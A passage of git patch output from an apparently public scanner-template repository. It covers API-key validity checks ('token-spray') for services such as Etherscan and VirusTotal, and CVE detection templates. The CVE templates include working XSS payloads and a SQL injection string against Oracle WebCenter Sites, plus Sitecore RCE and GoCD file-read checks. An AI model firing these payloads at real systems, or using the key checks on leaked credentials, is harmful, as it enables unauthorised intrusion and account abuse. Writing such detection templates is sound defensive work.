https://docs.etherscan.io/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Etherscan.md + tags: token-spray,etherscan + +self-contained: true +requests: + - method: GET + path: + - "https://api.etherscan.io/api?module=account&action=balance&address=0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae&tag=latest&apikey={{token}}" + + matchers: + - type: word + part: body + negative: true + words: + - 'Invalid API Key' diff --git a/token-spray/api-nownodes.yaml b/token-spray/api-nownodes.yaml new file mode 100644 index 0000000000..fd2cc1ee93 --- /dev/null +++ b/token-spray/api-nownodes.yaml @@ -0,0 +1,28 @@ +id: api-nownodes + +info: + name: Nownodes API Test + author: daffainfo + severity: info + reference: + - https://nownodes.io/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Nownodes.md + tags: token-spray,nownodes + +self-contained: true +requests: + - raw: + - | + GET /api HTTP/1.1 + Host: bsc-blockbook.nownodes.io + api-key: {{token}} + Content-Type: application/json + + matchers: + - type: word + part: body + words: + - '"coin":' + - '"host":' + - '"version":' + condition: and diff --git a/token-spray/api-thecatapi.yaml b/token-spray/api-thecatapi.yaml index f8399778d8..54740e47d8 100644 --- a/token-spray/api-thecatapi.yaml +++ b/token-spray/api-thecatapi.yaml @@ -4,7 +4,9 @@ info: name: TheCatApi API Test author: daffainfo severity: info - reference: https://docs.thecatapi.com/ + reference: + - https://docs.thecatapi.com/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md tags: token-spray,thecatapi self-contained: true @@ -16,7 +18,10 @@ requests: x-api-key: "{{token}}" matchers: - - type: status - negative: true - status: - - 401 + - type: word + part: body + words: + - 'id":' + - 'image_id":' + - 'sub_id":' + condition: and diff --git a/token-spray/api-thedogapi.yaml b/token-spray/api-thedogapi.yaml new file mode 100644 index 0000000000..75db08e1fc --- /dev/null +++ b/token-spray/api-thedogapi.yaml @@ -0,0 +1,27 @@ +id: api-thedogapi + +info: + name: TheDogApi API Test + author: daffainfo + severity: info + reference: + - https://docs.thedogapi.com/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheDogApi.md + tags: token-spray,thedogapi + +self-contained: true +requests: + - method: GET + path: + - "https://api.thedogapi.com/v1/votes" + headers: + x-api-key: "{{token}}" + + matchers: + - type: word + part: body + words: + - 'id":' + - 'image_id":' + - 'sub_id":' + condition: and From f0432b7b2e951393159b4fe73ade7ae16c57d446 Mon Sep 17 00:00:00 2001 From: daffainfo Date: Sat, 6 Nov 2021 11:40:49 +0700 Subject: [PATCH 3447/4083] Adding references --- token-spray/api-abuseipdb.yaml | 4 +++- token-spray/api-alienvault.yaml | 4 +++- token-spray/api-aniapi.yaml | 4 +++- token-spray/api-cooperhewitt.yaml | 4 +++- token-spray/api-dribbble.yaml | 4 +++- token-spray/api-europeana.yaml | 4 +++- token-spray/api-iucn.yaml | 6 ++++-- token-spray/api-myanimelist.yaml | 4 +++- token-spray/api-rijksmuseum.yaml | 4 +++- token-spray/api-urlscan.yaml | 4 +++- token-spray/api-virustotal.yaml | 4 +++- 11 files changed, 34 insertions(+), 12 deletions(-) diff --git a/token-spray/api-abuseipdb.yaml b/token-spray/api-abuseipdb.yaml index 9cf4dddf31..ca83d86700 100644 --- a/token-spray/api-abuseipdb.yaml +++ b/token-spray/api-abuseipdb.yaml @@ -4,7 +4,9 @@ info: name: AbuseIPDB API Test author: daffainfo severity: info - reference: https://docs.abuseipdb.com/ + reference: + - https://docs.abuseipdb.com/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md tags: token-spray,abuseipdb self-contained: true diff --git a/token-spray/api-alienvault.yaml b/token-spray/api-alienvault.yaml index a51c6edc4c..8bfd4447da 100644 --- a/token-spray/api-alienvault.yaml +++ b/token-spray/api-alienvault.yaml @@ -4,7 +4,9 @@ info: name: AlienVault Open Threat Exchange (OTX) API Test author: daffainfo severity: info - reference: https://otx.alienvault.com/api + reference: + - https://otx.alienvault.com/api + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md tags: token-spray,alienvault self-contained: true diff --git a/token-spray/api-aniapi.yaml b/token-spray/api-aniapi.yaml index 3b5f81a6e5..ab84bcd31f 100644 --- a/token-spray/api-aniapi.yaml +++ b/token-spray/api-aniapi.yaml @@ -4,7 +4,9 @@ info: name: AniAPI API Test author: daffainfo severity: info - reference: https://aniapi.com/docs/authentication + reference: + - https://aniapi.com/docs/authentication + - https://github.com/daffainfo/all-about-apikey/blob/main/Anime/AniAPI.md tags: token-spray,aniapi self-contained: true diff --git a/token-spray/api-cooperhewitt.yaml b/token-spray/api-cooperhewitt.yaml index 339f8ed1b2..c54d64e093 100644 --- a/token-spray/api-cooperhewitt.yaml +++ b/token-spray/api-cooperhewitt.yaml @@ -4,7 +4,9 @@ info: name: Cooper Hewitt API author: daffainfo severity: info - reference: https://collection.cooperhewitt.org/api/methods/ + reference: + - https://collection.cooperhewitt.org/api/methods/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md tags: token-spray,cooperhewitt self-contained: true diff --git a/token-spray/api-dribbble.yaml b/token-spray/api-dribbble.yaml index 147b3c2b72..ec36263d18 100644 --- a/token-spray/api-dribbble.yaml +++ b/token-spray/api-dribbble.yaml @@ -4,7 +4,9 @@ info: name: Dribbble API Test author: daffainfo severity: info - reference: https://developer.dribbble.com/v2/ + reference: + - https://developer.dribbble.com/v2/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md tags: token-spray,dribbble self-contained: true diff --git a/token-spray/api-europeana.yaml b/token-spray/api-europeana.yaml index 69c55b1560..520c83775d 100644 --- a/token-spray/api-europeana.yaml +++ b/token-spray/api-europeana.yaml @@ -4,7 +4,9 @@ info: name: Europeana API Test author: daffainfo severity: info - reference: https://pro.europeana.eu/page/search + reference: + - https://pro.europeana.eu/page/search + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md tags: token-spray,europeana self-contained: true diff --git a/token-spray/api-iucn.yaml b/token-spray/api-iucn.yaml index 878b4839ed..4dee6aacfc 100644 --- a/token-spray/api-iucn.yaml +++ b/token-spray/api-iucn.yaml @@ -3,8 +3,10 @@ id: api-iucn info: name: IUCN API Test author: daffainfo - severity: info - reference: http://apiv3.iucnredlist.org/api/v3/docs + severity: info + reference: + - http://apiv3.iucnredlist.org/api/v3/docs + - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/IUCN.md tags: token-spray,iucn self-contained: true diff --git a/token-spray/api-myanimelist.yaml b/token-spray/api-myanimelist.yaml index 498cffa893..d7fb301f08 100644 --- a/token-spray/api-myanimelist.yaml +++ b/token-spray/api-myanimelist.yaml @@ -4,7 +4,9 @@ info: name: MyAnimeList API Test author: daffainfo severity: info - reference: https://myanimelist.net/apiconfig/references/api/v2 + reference: + - https://myanimelist.net/apiconfig/references/api/v2 + - https://github.com/daffainfo/all-about-apikey/blob/main/Anime/MyAnimeList.md tags: token-spray,myanimelist self-contained: true diff --git a/token-spray/api-rijksmuseum.yaml b/token-spray/api-rijksmuseum.yaml index 20da90151a..6e6c1c40cd 100644 --- a/token-spray/api-rijksmuseum.yaml +++ b/token-spray/api-rijksmuseum.yaml @@ -4,7 +4,9 @@ info: name: Rijksmuseum API Test author: daffainfo severity: info - reference: https://data.rijksmuseum.nl/user-generated-content/api/ + reference: + - https://data.rijksmuseum.nl/user-generated-content/api/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Rijksmuseum.md tags: token-spray,rijksmuseum self-contained: true diff --git a/token-spray/api-urlscan.yaml b/token-spray/api-urlscan.yaml index 4baa2bec8b..93d5b196db 100644 --- a/token-spray/api-urlscan.yaml +++ b/token-spray/api-urlscan.yaml @@ -4,7 +4,9 @@ info: name: URLScan API Test author: daffainfo severity: info - reference: https://urlscan.io/docs/api/ + reference: + - https://urlscan.io/docs/api/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/URLScan.md tags: token-spray,urlscan self-contained: true diff --git a/token-spray/api-virustotal.yaml b/token-spray/api-virustotal.yaml index b546d99833..fbcb6e2600 100644 --- a/token-spray/api-virustotal.yaml +++ b/token-spray/api-virustotal.yaml @@ -4,7 +4,9 @@ info: name: VirusTotal API Test author: daffainfo severity: info - reference: https://developers.virustotal.com/reference#getting-started + reference: + - https://developers.virustotal.com/reference + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/VirusTotal.md tags: token-spray,virustotal self-contained: true From 1b1b20ff74fb689a72f1b3ab80fd3ededbdf2fd4 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 6 Nov 2021 12:38:20 +0700 Subject: [PATCH 3448/4083] Update api-iucn.yaml --- token-spray/api-iucn.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/token-spray/api-iucn.yaml b/token-spray/api-iucn.yaml index 4dee6aacfc..71f3e53bb5 100644 --- a/token-spray/api-iucn.yaml +++ b/token-spray/api-iucn.yaml @@ -3,7 +3,7 @@ id: api-iucn info: name: IUCN API Test author: daffainfo - severity: info + severity: info reference: - http://apiv3.iucnredlist.org/api/v3/docs - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/IUCN.md From 5fa10c4b6455ccefc1cfe8fb9a83a9d3417bceb6 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 6 Nov 2021 12:34:04 +0530 Subject: [PATCH 3449/4083] cves update --- .../2021/CVE-2021-42237.yaml | 7 ++++--- .../2021/CVE-2021-43287.yaml | 7 ++++--- 2 files changed, 8 insertions(+), 6 deletions(-) rename vulnerabilities/sitecore-pre-auth-rce.yaml => cves/2021/CVE-2021-42237.yaml (95%) rename misconfiguration/gocd/gocd-arbitrary-file.yaml => cves/2021/CVE-2021-43287.yaml (86%) diff --git a/vulnerabilities/sitecore-pre-auth-rce.yaml b/cves/2021/CVE-2021-42237.yaml similarity index 95% rename from vulnerabilities/sitecore-pre-auth-rce.yaml rename to cves/2021/CVE-2021-42237.yaml index 270f3d18f2..1e8ce1c74c 100644 --- a/vulnerabilities/sitecore-pre-auth-rce.yaml +++ b/cves/2021/CVE-2021-42237.yaml @@ -1,14 +1,14 @@ -id: sitecore-pre-auth-rce +id: CVE-2021-42237 info: name: Sitecore Experience Platform Pre-Auth RCE author: pdteam severity: critical - description: This issue is related to a remote code execution vulnerability through insecure deserialization in the Report.ashx file. This file was used to drive the Executive Insight Dashboard (of Silverlight report) that was deprecated in 8.0 Initial Release. - tags: rce,sitecore,deserialization,oast + description: Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability. reference: - https://blog.assetnote.io/2021/11/02/sitecore-rce/ - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776 + - https://nvd.nist.gov/vuln/detail/CVE-2021-42237 remediation: For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions- - Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher. @@ -18,6 +18,7 @@ info: For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. metadata: shodan-query: http.title:"SiteCore" + tags: rce,sitecore,deserialization,oast requests: - raw: diff --git a/misconfiguration/gocd/gocd-arbitrary-file.yaml b/cves/2021/CVE-2021-43287.yaml similarity index 86% rename from misconfiguration/gocd/gocd-arbitrary-file.yaml rename to cves/2021/CVE-2021-43287.yaml index 142eeb0f3b..6081b95043 100644 --- a/misconfiguration/gocd/gocd-arbitrary-file.yaml +++ b/cves/2021/CVE-2021-43287.yaml @@ -1,14 +1,14 @@ -id: gocd-arbitrary-file +id: CVE-2021-43287 info: - name: GoCD Arbitrary File + name: Pre-Auth Takeover of Build Pipelines in GoCD author: dhiyaneshDk severity: critical reference: - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50 - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 - tags: go,lfi,gocd + tags: cve,cve2021,go,lfi,gocd metadata: shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" @@ -22,6 +22,7 @@ requests: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" From 2b38dce99c5af9ef54521ca1920550a13b9d7639 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 6 Nov 2021 12:51:30 +0530 Subject: [PATCH 3450/4083] updated with improved matchers --- cves/2018/CVE-2018-2791.yaml | 32 ++++++++++++++++---------------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/cves/2018/CVE-2018-2791.yaml b/cves/2018/CVE-2018-2791.yaml index df8d390be0..3b9ac98e97 100644 --- a/cves/2018/CVE-2018-2791.yaml +++ b/cves/2018/CVE-2018-2791.yaml @@ -2,7 +2,7 @@ id: CVE-2018-2791 info: name: Oracle WebCenter Sites Multiple XSS - author: madrobot + author: madrobot,leovalcante severity: high description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. classification: @@ -15,29 +15,29 @@ info: - http://www.securityfocus.com/bid/103800 - https://www.exploit-db.com/exploits/44752/ - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites - tags: cve,cve2018,oracle,xss,webcenter sites,wcs + tags: cve,cve2018,oracle,xss,wcs requests: - raw: - | - GET /cs/Satellite?c=qqqq&cid=qqqq&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq"> HTTP/1.1 + GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: {{BaseURL}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 + - | - GET /cs/Satellite?destpage="&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1 Host: {{BaseURL}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 + + stop-at-first-match: true + matchers-condition: or matchers: - type: word + part: body + words: + - '/graphics/common/screen/dotclear.gif' + + - type: word + part: body words: - '' - part: body - - type: word - words: - - "text/html" - part: header - stop-at-first-match: true \ No newline at end of file + - 'Missing translation key' + condition: and \ No newline at end of file From c474434ab227fa53a49c367630d24834846ed12a Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 6 Nov 2021 13:17:42 +0530 Subject: [PATCH 3451/4083] improved matchers --- cves/2018/CVE-2018-3238.yaml | 42 +++++++++++++++++++----------------- 1 file changed, 22 insertions(+), 20 deletions(-) diff --git a/cves/2018/CVE-2018-3238.yaml b/cves/2018/CVE-2018-3238.yaml index 19ba8b5b7b..0a6b11e4ca 100644 --- a/cves/2018/CVE-2018-3238.yaml +++ b/cves/2018/CVE-2018-3238.yaml @@ -4,36 +4,38 @@ info: name: Multiple XSS Oracle WebCenter Sites author: leovalcante severity: medium - description: Check cve-2018-3238 for Oracle WebCenter Sites. + description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 11.1.1.8.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. reference: - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites - https://nvd.nist.gov/vuln/detail/CVE-2018-3238 - tags: oracle,webcenter sites,wcs,xss + tags: cve,cve2018,oracle,wcs,xss requests: - raw: - | - GET /cs/Satellite?c=qqqq&cid=qqqq&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq"> HTTP/1.1 - Host: {{BaseURL}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 + GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq"> HTTP/1.1 + Host: {{Hostname}} + - | - GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(24)%3C/script%3E HTTP/1.1 - Host: {{BaseURL}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 + GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | - GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(24)%3C/script%3E HTTP/1.1 - Host: {{BaseURL}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 + GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true + matchers-condition: or matchers: - type: word - words: - - '' part: body - stop-at-first-match: true \ No newline at end of file + words: + - '/graphics/common/screen/dotclear.gif' + + - type: word + part: body + words: + - '' + - 'Variables.cs_imagedir' + condition: and \ No newline at end of file From e4cda8174573ba0085f74d642ac230505f5fe324 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 6 Nov 2021 13:41:08 +0530 Subject: [PATCH 3452/4083] misc updates --- cves/2019/CVE-2019-2578.yaml | 23 +++++++++-------------- 1 file changed, 9 insertions(+), 14 deletions(-) diff --git a/cves/2019/CVE-2019-2578.yaml b/cves/2019/CVE-2019-2578.yaml index ecd70f5aa0..273371ef93 100644 --- a/cves/2019/CVE-2019-2578.yaml +++ b/cves/2019/CVE-2019-2578.yaml @@ -4,29 +4,24 @@ info: name: Broken Access Control Oracle WebCenter Sites author: leovalcante severity: high - description: Check cve-2019-2578 for Oracle WebCenter Sites. + description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data. reference: https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites - tags: oracle,webcenter sites,wcs,broken access control + tags: cve,cve2019,oracle,wcs,auth-bypass requests: - raw: - | GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1 - Host: {{BaseURL}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 + Host: {{Hostname}} + - | GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1 - Host: {{BaseURL}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - redirects: false + Host: {{Hostname}} + + stop-at-first-match: true matchers: - type: regex - regex: - - '' part: body - stop-at-first-match: true \ No newline at end of file + regex: + - '' \ No newline at end of file From 3a9fcc7cc05a17620e2dc08c047d670d6bd1be58 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 6 Nov 2021 08:15:35 +0000 Subject: [PATCH 3453/4083] Auto Generated CVE annotations [Sat Nov 6 08:15:35 UTC 2021] :robot: --- cves/2018/CVE-2018-3238.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2018/CVE-2018-3238.yaml b/cves/2018/CVE-2018-3238.yaml index 0a6b11e4ca..6ac30f80d6 100644 --- a/cves/2018/CVE-2018-3238.yaml +++ b/cves/2018/CVE-2018-3238.yaml @@ -9,6 +9,10 @@ info: - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites - https://nvd.nist.gov/vuln/detail/CVE-2018-3238 tags: cve,cve2018,oracle,wcs,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N + cvss-score: 6.90 + cve-id: CVE-2018-3238 requests: From 6f0c6a043bcb3e165d5651cc3c0a54a66acffba0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 6 Nov 2021 08:18:29 +0000 Subject: [PATCH 3454/4083] Auto Generated CVE annotations [Sat Nov 6 08:18:29 UTC 2021] :robot: --- cves/2019/CVE-2019-2578.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2019/CVE-2019-2578.yaml b/cves/2019/CVE-2019-2578.yaml index 273371ef93..5ab3f5b1f0 100644 --- a/cves/2019/CVE-2019-2578.yaml +++ b/cves/2019/CVE-2019-2578.yaml @@ -7,6 +7,10 @@ info: description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data. reference: https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites tags: cve,cve2019,oracle,wcs,auth-bypass + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.60 + cve-id: CVE-2019-2578 requests: From bfa7fb10ed5615b19a9f2052dea0ecae2a0a2a37 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 6 Nov 2021 16:21:29 +0700 Subject: [PATCH 3455/4083] Update api-covalent.yaml --- token-spray/api-covalent.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/token-spray/api-covalent.yaml b/token-spray/api-covalent.yaml index ad6594f1ee..159aca5e52 100644 --- a/token-spray/api-covalent.yaml +++ b/token-spray/api-covalent.yaml @@ -18,6 +18,8 @@ requests: matchers: - type: word part: body - negative: true words: - - 'Invalid API key' + - '"address":' + - '"updated_at":' + - '"next_update_at":' + condition: and From 48b1bdb9d133535378cd7da548e6dcd930243114 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 6 Nov 2021 16:23:44 +0700 Subject: [PATCH 3456/4083] Update api-etherscan.yaml --- token-spray/api-etherscan.yaml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/token-spray/api-etherscan.yaml b/token-spray/api-etherscan.yaml index 144601dacc..f72998882f 100644 --- a/token-spray/api-etherscan.yaml +++ b/token-spray/api-etherscan.yaml @@ -15,9 +15,17 @@ requests: path: - "https://api.etherscan.io/api?module=account&action=balance&address=0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae&tag=latest&apikey={{token}}" + matchers-condition: and matchers: - type: word part: body negative: true words: - 'Invalid API Key' + + - type: word + part: body + words: + - '"status":' + - '"message":"OK"' + condition: and From ce2212b6d4ca83f1c90c08b4217b60ee53023371 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 6 Nov 2021 16:10:58 +0530 Subject: [PATCH 3457/4083] Added CVE-2019-2579 --- cves/2019/CVE-2019-2579.yaml | 47 ++++++++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 cves/2019/CVE-2019-2579.yaml diff --git a/cves/2019/CVE-2019-2579.yaml b/cves/2019/CVE-2019-2579.yaml new file mode 100644 index 0000000000..b1abcfb551 --- /dev/null +++ b/cves/2019/CVE-2019-2579.yaml @@ -0,0 +1,47 @@ +id: CVE-2019-2579 + +info: + name: Oracle WebCenter Sites - SQL Injection + author: leovalcante + severity: medium + description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data. + reference: + - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites + - https://github.com/Leovalcante/wcs_scanner + tags: cve,cve2019,oracle,wcs,sqli + + +requests: + - raw: + - | + GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1 + Host: {{Hostname}} + + - | + POST /cs/ContentServer HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+ + + cookie-reuse: true + extractors: + - type: regex + name: authkey + part: body + internal: true + group: 1 + regex: + - "NAME='_authkey_' VALUE='([0-9A-Z]+)'>" + + matchers-condition: and + matchers: + - type: word + words: + - "value='' and '1'='0 --" + - "Use this utility to view and manage URLs" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From b52d878f9acb04b1fcd65df9dd1d5f494aeda028 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 6 Nov 2021 16:13:58 +0530 Subject: [PATCH 3458/4083] Update CVE-2016-3088.yaml --- cves/2016/CVE-2016-3088.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2016/CVE-2016-3088.yaml b/cves/2016/CVE-2016-3088.yaml index 8a5735937b..f8446e5651 100644 --- a/cves/2016/CVE-2016-3088.yaml +++ b/cves/2016/CVE-2016-3088.yaml @@ -28,7 +28,7 @@ requests: matchers: - type: dsl dsl: - - "status_code_0==204" - - "status_code_1==200" - - "contains((body_1), '{{randstr}}')" + - "status_code_1==204" + - "status_code_2==200" + - "contains((body_2), '{{randstr}}')" condition: and From a6d228ad501a6b35edad85975aec9cdfb4be18be Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 6 Nov 2021 16:27:38 +0530 Subject: [PATCH 3459/4083] misc updates --- ...er-configuration.yaml => gocd-cruise-configuration.yaml} | 6 +++--- misconfiguration/gocd/gocd-encryption-key.yaml | 2 +- misconfiguration/gocd/gocd-unauth-dashboard.yaml | 2 +- misconfiguration/nginx/nginx-status.yaml | 2 +- 4 files changed, 6 insertions(+), 6 deletions(-) rename misconfiguration/gocd/{gocd-server-configuration.yaml => gocd-cruise-configuration.yaml} (86%) diff --git a/misconfiguration/gocd/gocd-server-configuration.yaml b/misconfiguration/gocd/gocd-cruise-configuration.yaml similarity index 86% rename from misconfiguration/gocd/gocd-server-configuration.yaml rename to misconfiguration/gocd/gocd-cruise-configuration.yaml index 42bd771332..680749ab7c 100644 --- a/misconfiguration/gocd/gocd-server-configuration.yaml +++ b/misconfiguration/gocd/gocd-cruise-configuration.yaml @@ -1,14 +1,14 @@ -id: gocd-server-configuration +id: gocd-cruise-configuration info: - name: GoCd Server Configuration + name: GoCd Cruise Configuration disclosure author: dhiyaneshDk severity: high reference: - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50 - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 - tags: go,lfi,gocd + tags: go,gocd,config,exposure,misconfig metadata: shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" diff --git a/misconfiguration/gocd/gocd-encryption-key.yaml b/misconfiguration/gocd/gocd-encryption-key.yaml index 094685f494..6f1d3eb837 100644 --- a/misconfiguration/gocd/gocd-encryption-key.yaml +++ b/misconfiguration/gocd/gocd-encryption-key.yaml @@ -8,7 +8,7 @@ info: - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50 - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 - tags: go,lfi,gocd + tags: go,gocd,exposure,misconfig metadata: shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" diff --git a/misconfiguration/gocd/gocd-unauth-dashboard.yaml b/misconfiguration/gocd/gocd-unauth-dashboard.yaml index 16b3d7dd07..aa381424d7 100644 --- a/misconfiguration/gocd/gocd-unauth-dashboard.yaml +++ b/misconfiguration/gocd/gocd-unauth-dashboard.yaml @@ -4,9 +4,9 @@ info: name: GoCd Unauth Dashboard author: dhiyaneshDk severity: medium - tags: go,gocd,unauth metadata: shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" + tags: 